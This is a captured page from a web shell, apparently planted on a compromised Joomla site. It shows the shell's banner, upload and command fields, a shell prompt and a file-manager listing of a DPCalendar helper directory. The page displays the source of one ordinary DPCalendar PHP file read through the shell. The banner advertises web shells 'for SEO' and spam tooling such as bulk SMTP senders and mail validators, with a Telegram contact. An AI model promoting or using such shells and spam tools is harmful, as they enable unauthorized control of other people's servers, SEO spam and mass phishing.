__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php
/**
 * @package   DPCalendar
 * @copyright Copyright (C) 2014 Digital Peak GmbH. <https://www.digital-peak.com>
 * @license   https://www.gnu.org/licenses/gpl-3.0.html GNU/GPL
 */

namespace DigitalPeak\Component\DPCalendar\Administrator\Helper;

use DigitalPeak\Component\DPCalendar\Administrator\Model\FieldsOrderModel;
use Joomla\CMS\Application\CMSApplicationInterface;
use Joomla\CMS\Factory;
use Joomla\Registry\Registry;

defined('_JEXEC') or die();

class FieldsOrder
{
	public static function getBookingFields(\stdClass $booking, Registry $params, CMSApplicationInterface $app): array
	{
		return self::getModel()->getBookingFields($booking, $params, $app);
	}

	public static function getTicketFields(\stdClass $ticket, Registry $params, CMSApplicationInterface $app): array
	{
		return self::getModel()->getTicketFields($ticket, $params, $app);
	}

	private static function getModel(): FieldsOrderModel
	{
		return Factory::getApplication()->bootComponent('dpcalendar')->getMVCFactory()->createModel('FieldsOrder', 'Administrator');
	}
}

Filemanager

Name Type Size Permission Actions
Booking.php File 15.79 KB 0664
DPCalendarHelper.php File 53.13 KB 0664
DateHelper.php File 6.57 KB 0664
ExportTrait.php File 16.64 KB 0664
FieldsOrder.php File 1.03 KB 0664
Location.php File 1.76 KB 0664
Filemanager